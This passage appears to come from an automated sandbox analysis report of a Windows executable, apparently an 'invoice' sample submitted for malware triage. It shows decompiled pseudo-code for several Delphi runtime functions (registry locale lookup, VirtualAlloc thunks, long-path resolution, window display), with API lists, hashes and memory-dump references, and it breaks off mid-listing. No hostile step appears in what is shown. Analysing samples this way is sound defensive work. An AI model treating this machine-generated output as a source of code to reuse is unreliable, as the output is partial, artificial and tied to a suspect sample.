                                    • Part of subcall function 00437098: GetCurrentThreadId.KERNEL32 ref: 00437107
                                    • Part of subcall function 00437098: GlobalAddAtomA.KERNEL32 ref: 0043713D
                                    • Part of subcall function 00437098: RegisterClipboardFormatA.USER32 ref: 00437153
                                    • Part of subcall function 00437098: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00437210), ref: 004371D7
                                    • Part of subcall function 00437098: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 004371E8
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                  • String ID:
                                  • API String ID: 3775504709-0
                                  • Opcode ID: 00ec1fbcea8a8c286b490e80c62bb5ce75e471034f08af960100f33daf45af21
                                  • Instruction ID: 707a3c92acec95c974c860f69107c428bf46c43c41c19028877ccff92c651e72
                                  • Opcode Fuzzy Hash: 00ec1fbcea8a8c286b490e80c62bb5ce75e471034f08af960100f33daf45af21
                                  • Instruction Fuzzy Hash: 5AF04FB530C2409FC320AB25FD52A157BA4F78A3147A1A07BEC4087671C5B8AC52DB6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404E34, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00404E34(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x400000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E00405070(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x400000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x400000
				return  *_t7;
			}








                                  0x00404e3c
                                  0x00404e42
                                  0x00404e4e
                                  0x00404e52
                                  0x00404e5b
                                  0x00404e60
                                  0x00404e62
                                  0x00404e67
                                  0x00404e69
                                  0x00404e6c
                                  0x00404e6c
                                  0x00404e67
                                  0x00404e6f
                                  0x00404e7a

                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,00410240,00404E9C,00405940,0000FF9D,?,00000400,?,00410240,004134D3,00000000,004134F8), ref: 00404E52
                                    • Part of subcall function 00405070: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0044D0A4,?,00404E60,00400000,?,00000105,00000001,00410240,00404E9C,00405940,0000FF9D,?), ref: 0040508C
                                    • Part of subcall function 00405070: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0044D0A4,?,00404E60,00400000,?,00000105,00000001), ref: 004050AA
                                    • Part of subcall function 00405070: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0044D0A4), ref: 004050C8
                                    • Part of subcall function 00405070: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 004050E6
                                    • Part of subcall function 00405070: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405175,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040512F
                                    • Part of subcall function 00405070: RegQueryValueExA.ADVAPI32(?,004052DC,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405175,?,80000001), ref: 0040514D
                                    • Part of subcall function 00405070: RegCloseKey.ADVAPI32(?,0040517C,00000000,00000000,00000005,00000000,00405175,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0040516F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Open$FileModuleNameQueryValue$Close
                                  • String ID:
                                  • API String ID: 2796650324-0
                                  • Opcode ID: 3855c074a3c99940ec4b8fe29ccf32c05425aa7ee1b52fe41a6d2995bdb4701f
                                  • Instruction ID: 5d39e02b33a5e1a50daa166209b6e4678cdb7a90b1483256e0dd93e64e7ea764
                                  • Opcode Fuzzy Hash: 3855c074a3c99940ec4b8fe29ccf32c05425aa7ee1b52fe41a6d2995bdb4701f
                                  • Instruction Fuzzy Hash: ADE06DB1A003148BCB50DE68C8C1A4733D8AB88794F0005A6ED58EF38AD375DD208BD4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004016A8, Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004016A8(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x44f5e8; // 0x70aa0c
				while(_t29 != 0x44f5e8) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                  0x004016af
                                  0x004016b3
                                  0x004016ba
                                  0x004016cf
                                  0x004016d7
                                  0x004016dd
                                  0x004016e3
                                  0x004016e6
                                  0x0040172a
                                  0x004016ee
                                  0x004016f4
                                  0x004016f8
                                  0x004016fa
                                  0x004016fa
                                  0x00401700
                                  0x00401702
                                  0x00401702
                                  0x00401708
                                  0x00401715
                                  0x0040171c
                                  0x0040171e
                                  0x00401724
                                  0x00000000
                                  0x00401724
                                  0x0040171c
                                  0x00401728
                                  0x00401728
                                  0x00401739

                                  APIs
                                  • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401715
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 1d98116b899e6dad0f23848bcab155ddb68db16b8b6dc093d4533f62986dabc7
                                  • Instruction ID: cb0795bba48fe4944a77baed4b981b17b22ff9c7f9537bef7671d2c9ea66ac43
                                  • Opcode Fuzzy Hash: 1d98116b899e6dad0f23848bcab155ddb68db16b8b6dc093d4533f62986dabc7
                                  • Instruction Fuzzy Hash: 9F11CE76A047019FC3108F29CC80A1BB7E5EFC4361F05C53DE598A73A5E735AC418B49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00419F54, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00419F54(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x44f884 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x44f880; // 0x610000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E004028B8(0x44d3ec, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E00419F4C(_t2, E00419F2C);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E00419F4C(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x44f884;
						 *0x44f884 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x44f880 = _t35;
				}
				_t25 =  *0x44f884;
				 *0x44f884 =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x44f884;
			}








                                  0x00419f62
                                  0x00419f72
                                  0x00419f77
                                  0x00419f79
                                  0x00419f7e
                                  0x00419f80
                                  0x00419f8d
                                  0x00419f97
                                  0x00419f9f
                                  0x00419fa2
                                  0x00419fa2
                                  0x00419fa5
                                  0x00419fa5
                                  0x00419fa8
                                  0x00419fb2
                                  0x00419fb7
                                  0x00419fba
                                  0x00419fbc
                                  0x00419fc3
                                  0x00419fca
                                  0x00419fca
                                  0x00419fd2
                                  0x00419fd7
                                  0x00419fdc
                                  0x00419fe2
                                  0x00419fe9

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00419F72
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 31cfe24dff61b9a1b27bf233503cf63d1a08518ab1e38e3088d5a77c31aa035e
                                  • Instruction ID: d419a49ea90da181cd21ae955be0258d3c3f444cfa0f9024e47cf4dbe1e1ee23
                                  • Opcode Fuzzy Hash: 31cfe24dff61b9a1b27bf233503cf63d1a08518ab1e38e3088d5a77c31aa035e
                                  • Instruction Fuzzy Hash: E11157746007059BD710EF19C880B86FBE4EF88790F14C57AE998CF385D3B8E8458BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00404EB8, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136stringlibraryfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E00404EB8(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00404EA4(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00404EA4(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401294();
									while( *_t93 != 0) {
										_t90 = E00404EA4(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401294();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L0040129C();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401294();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L0040129C();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401294();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401294();
						}
					}
				}
				L17:
				return _v16;
			}



















                                  0x00404ec4
                                  0x00404ec7
                                  0x00404ecd
                                  0x00404eda
                                  0x00404ede
                                  0x00404f20
                                  0x00404f26
                                  0x00404f63
                                  0x00000000
                                  0x00404f28
                                  0x00404f2f
                                  0x00404f40
                                  0x00404f45
                                  0x00404f4b
                                  0x00404f53
                                  0x00404f58
                                  0x00404f66
                                  0x00404f68
                                  0x00404f6e
                                  0x00404f72
                                  0x00404f79
                                  0x00404f7a
                                  0x00405025
                                  0x00404f8c
                                  0x00404f90
                                  0x00404f9d
                                  0x00404fa4
                                  0x00404fa5
                                  0x00404fae
                                  0x00404faf
                                  0x00404fc7
                                  0x00404fcc
                                  0x00404fcf
                                  0x00404fd4
                                  0x00404fda
                                  0x00404fdb
                                  0x00404feb
                                  0x00404fed
                                  0x00404ffd
                                  0x00405004
                                  0x0040500e
                                  0x0040500f
                                  0x00405014
                                  0x0040501a
                                  0x0040501b
                                  0x00405021
                                  0x00405023
                                  0x00000000
                                  0x00405023
                                  0x00404feb
                                  0x00404fcc
                                  0x00000000
                                  0x00404f9d
                                  0x00405031
                                  0x00405038
                                  0x0040503c
                                  0x0040503d
                                  0x0040503d
                                  0x00404f58
                                  0x00404f45
                                  0x00404f2f
                                  0x00404ee0
                                  0x00404eeb
                                  0x00404eef
                                  0x00000000
                                  0x00404ef1
                                  0x00404ef1
                                  0x00404efc
                                  0x00404f00
                                  0x00404f05
                                  0x00000000
                                  0x00404f07
                                  0x00404f0a
                                  0x00404f11
                                  0x00404f15
                                  0x00404f16
                                  0x00404f16
                                  0x00404f05
                                  0x00404eef
                                  0x00405042
                                  0x0040504b

                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0044D0A4,?,00405118,00000000,00405175,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404ED5
                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00404EE6
                                  • lstrcpyn.KERNEL32(?,?,?,?,00000001,0044D0A4,?,00405118,00000000,00405175,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404F16
                                  • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0044D0A4,?,00405118,00000000,00405175,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404F7A
                                  • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0044D0A4,?,00405118,00000000,00405175,?,80000001), ref: 00404FAF
                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0044D0A4,?,00405118,00000000,00405175), ref: 00404FC2
                                  • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0044D0A4,?,00405118,00000000), ref: 00404FCF
                                  • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0044D0A4,?,00405118), ref: 00404FDB
                                  • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 0040500F
                                  • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040501B
                                  • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 0040503D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                  • API String ID: 3245196872-1565342463
                                  • Opcode ID: 064bd4271abd3baf5f6a2ea5bf1372874cfae7e78b4d63dd141667c34cc62e5c
                                  • Instruction ID: 9798656d04a7b00f6dc240650ffacff7d6aa2fe947a2b393b3f1bd6a93fe5dfb
                                  • Opcode Fuzzy Hash: 064bd4271abd3baf5f6a2ea5bf1372874cfae7e78b4d63dd141667c34cc62e5c
                                  • Instruction Fuzzy Hash: 454164B2A00559ABDB10DAA8CD85ADF77ECEF48304F1401FAB548F7281D6789E458F98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004474C0, Relevance: 18.4, APIs: 12, Instructions: 407windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E004474C0(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x447a2a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
					_t294 =  *0x44e100; // 0x41a2b0
					E00405910(_t294,  &_v12);
					E0040B070(_v12, 1);
					E0040384C();
				}
				_t149 =  *0x44fbb0; // 0x2191714
				E0044BB54(_t149);
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
				_push(_t372);
				_push(0x447a0d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x447914);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004032D4(_v8, __eflags);
						 *[fs:eax] = 0;
						_t160 =  *0x44fbb4; // 0x2191320
						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
							__eflags = 0;
							E0044666C(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E004325A4(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E004325A4(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E004422D0(E004325A4(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E004325A4(_v8), 0);
								} else {
									SetWindowPos(E004325A4(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E004325A4(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E0042FAFC(_v8);
						}
					} else {
						_push(_t372);
						_push(0x447578);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004032D4(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E00448D58() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E00448D4C() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x44fbb0; // 0x2191714
								_t305 = E0042B8F4( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x44fbb0; // 0x2191714
								_t248 = E0042B938( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E0044591C(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E00448D88() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E00448D7C() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x44fbb0; // 0x2191714
										_t311 = E0042B8F4( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x44fbb0; // 0x2191714
										_t269 = E0042B938( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x44fbb0; // 0x2191714
								_t370 =  *(_t270 + 0x44);
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x440c08; // 0x440c54
									_t290 = E00403264( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E00448D58() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E00448D4C() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E0044591C(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E004325A4(_v8),  *(0x44dc94 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E004325A4(_v8),  *(0x44dc94 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x4061c8, E004325A4(_v8), 5, 0, _t220);
								E0042C114();
							} else {
								_t231 = E004325A4(_v8);
								_t232 =  *0x44fbb0; // 0x2191714
								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
								ShowWindow(E004325A4(_v8), 3);
							}
							_t226 =  *0x44fbb0; // 0x2191714
							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x447a14);
				_t154 = _v8;
				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
				return _t154;
			}


























































                                  0x004474c1
                                  0x004474c3
                                  0x004474cb
                                  0x004474ce
                                  0x004474d3
                                  0x004474d4
                                  0x004474d9
                                  0x004474dc
                                  0x004474e6
                                  0x004474f7
                                  0x004474fc
                                  0x0044750b
                                  0x00447510
                                  0x00447510
                                  0x00447515
                                  0x0044751a
                                  0x00447522
